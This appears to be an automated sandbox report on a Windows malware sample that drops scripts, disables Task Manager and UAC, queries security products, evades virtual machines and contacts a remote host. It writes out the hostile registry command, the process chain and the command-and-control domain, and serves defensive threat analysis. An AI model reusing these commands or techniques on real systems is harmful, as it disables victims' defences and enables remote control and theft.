            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599891
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599781
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599890
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599781
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 600000
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 599797
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeThread delayed: delay time: 922337203685477
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeFile opened: C:\Users\userJump to behavior
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.2038582696.000000001C02D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_
            Source: wscript.exe, 00000002.00000003.1431982960.0000000002FC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.2038582696.000000001C087000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllN
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1845505229.000000001BD2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsetup.exe,0
            Source: wscript.exe, 00000002.00000003.1431982960.0000000002FC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2194422179.000000001C143000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2517444827.000000001C57D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2517444827.000000001C57D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}fz
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.2038582696.000000001BFC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: SurrogateContainerAgent.exe, 00000005.00000002.1510343188.000000001C676000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: w32tm.exe, 00000012.00000002.1527996968.000001EA4AC38000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1702926694.000000001BA30000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2370001609.000000001BDCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeAPI call chain: ExitProcess graph end nodegraph_0-24596
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0036866F
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036753D mov eax, dword ptr fs:[00000030h]0_2_0036753D
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036B710 GetProcessHeap,0_2_0036B710
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess token adjusted: DebugJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: DebugJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: DebugJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035F063 SetUnhandledExceptionFilter,0_2_0035F063
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0035F22B
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0036866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0036866F
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0035EF05
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portcontainerRef\myQbMgAKm.vbe" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portcontainerRef\J34SCTDenq2CEriZjkOuf.bat" "Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\portcontainerRef\SurrogateContainerAgent.exe "C:\portcontainerRef\SurrogateContainerAgent.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\suxlltqCa3.bat" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe "C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe" Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\d652d8e0-fd2b-4425-99bd-1792324a729f.vbs" Jump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\a838f51f-2608-4fa8-98f2-8c025efe4e1a.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\edd106de-c4c6-4bbc-b780-ae6716fb30a7.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\91745221-1208-4818-9185-e92567cf8b4d.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5607663c-c622-426c-855c-ef5fb85dae90.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\9e72009f-739b-4ea4-b505-4e802e14614f.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\8636c2ce-b0e0-4557-b01c-75132397eb84.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c1de1a4a-c903-48ef-a3ac-c4f3ffa7e9ae.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\1aed32cf-2de1-4530-92b6-4347a499f45a.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\01cb5ea0-7f93-4a93-908b-352473040093.vbs"
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\c755c5ef-7934-4641-b1a5-88ef130986ad.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035ED5B cpuid 0_2_0035ED5B
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0035A63C
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeQueries volume information: C:\portcontainerRef\SurrogateContainerAgent.exe VolumeInformationJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\portcontainerRef\SurrogateContainerAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0035D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_0035D5D4
            Source: C:\Users\user\Desktop\adKGhCOOzg.exeCode function: 0_2_0034ACF5 GetVersionExW,0_2_0034ACF5
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            Source: C:\Windows\SysWOW64\reg.exe | Registry value created: DisableTaskMgr 1
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Registry value created: PromptOnSecureDesktop 0
            Source: C:\portcontainerRef\SurrogateContainerAgent.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
            Source: C:\Windows\SysWOW64\reg.exe | Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1702926694.000000001BA30000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1845505229.000000001BCD7000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1845505229.000000001BC70000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2366644670.000000001BD16000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2284259952.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
            Source: C:\portcontainerRef\zTShuhFeOCWKXCInUCSTgJmE.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000013.00000002.1571279590.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1476955180.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000013.00000002.1571279590.000000000279D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001A.00000002.1611979914.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1476955180.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.1480370070.000000001344D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: SurrogateContainerAgent.exe PID: 7676, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 7108, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 2156, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 1868, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 5336, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 5376, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 3420, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 4460, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 3592, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000013.00000002.1571279590.0000000002761000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1476955180.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1571279590.000000000279D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.1611979914.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1476955180.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1480370070.000000001344D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: SurrogateContainerAgent.exe PID: 7676, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 7108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 2156, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 1868, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 5336, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 5376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 3420, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 4460, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: zTShuhFeOCWKXCInUCSTgJmE.exe PID: 3592, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques flagged for this sample, grouped by tactic column; the number in parentheses is the count shown in the matrix cell):

Reconnaissance: none flagged
Resource Development: Scripting (12)
Initial Access: none flagged
Execution: Windows Management Instrumentation (241); Command and Scripting Interpreter (2); Scheduled Task/Job (1)
Persistence: Scripting (12); DLL Side-Loading (1); Scheduled Task/Job (1)
Privilege Escalation: DLL Side-Loading (1); Bypass User Account Control (1); Process Injection (11); Scheduled Task/Job (1)
Defense Evasion: Disable or Modify Tools (31); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (2); Software Packing (11); DLL Side-Loading (1); Bypass User Account Control (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (151); Process Injection (11)
Credential Access: none flagged
Discovery: System Time Discovery (1); File and Directory Discovery (3); System Information Discovery (57); Security Software Discovery (261); Process Discovery (1); Virtualization/Sandbox Evasion (151); Application Window Discovery (1)
Lateral Movement: none flagged
Collection: Archive Collected Data (11)
Command and Control: Ingress Tool Transfer (3); Encrypted Channel (1); Non-Application Layer Protocol (3); Application Layer Protocol (13)
Exfiltration: none flagged
Impact: none flagged
Behavior Graph ID: 1520355
Sample: adKGhCOOzg.exe
Start date: 27/09/2024
Architecture: WINDOWS
Score: 100

Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 13 other signatures
Contacted host: a1025223.xsph.ru (141.8.194.149, ports 49714, 49715, 49716; SPRINTHOSTRU, Russian Federation), contacted by zTShuhFeOCWKXCInUCSTgJmE.exe

Process tree (started processes, dropped files and per-process signatures in brackets):

adKGhCOOzg.exe
  dropped: C:\...\SurrogateContainerAgent.exe (PE32)
  dropped: C:\portcontainerRef\myQbMgAKm.vbe (data)
  wscript.exe  [Windows Scripting host queries suspicious COM object (likely to drop second stage)]
    cmd.exe
      SurrogateContainerAgent.exe  [Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; 4 other signatures]
        dropped: C:\...\zTShuhFeOCWKXCInUCSTgJmE.exe (PE32)
        dropped: C:\Users\user\AppData\...\suxlltqCa3.bat (DOS)
        cmd.exe
          w32tm.exe
          conhost.exe
          zTShuhFeOCWKXCInUCSTgJmE.exe
        schtasks.exe
        schtasks.exe
        4 other processes
      reg.exe  [Disable Task Manager(disabletaskmgr); Disables the Windows task manager (taskmgr)]
      conhost.exe
zTShuhFeOCWKXCInUCSTgJmE.exe  (contacts a1025223.xsph.ru)
  dropped: 826f54c5c35521aef4...44affffb02e2dfd.exe (PE32)
  dropped: f765102e-847e-4ba7-8e69-2cfb40b35d1c.vbs (ASCII)
  dropped: d652d8e0-fd2b-4425-99bd-1792324a729f.vbs (ASCII)
  wscript.exe
    zTShuhFeOCWKXCInUCSTgJmE.exe
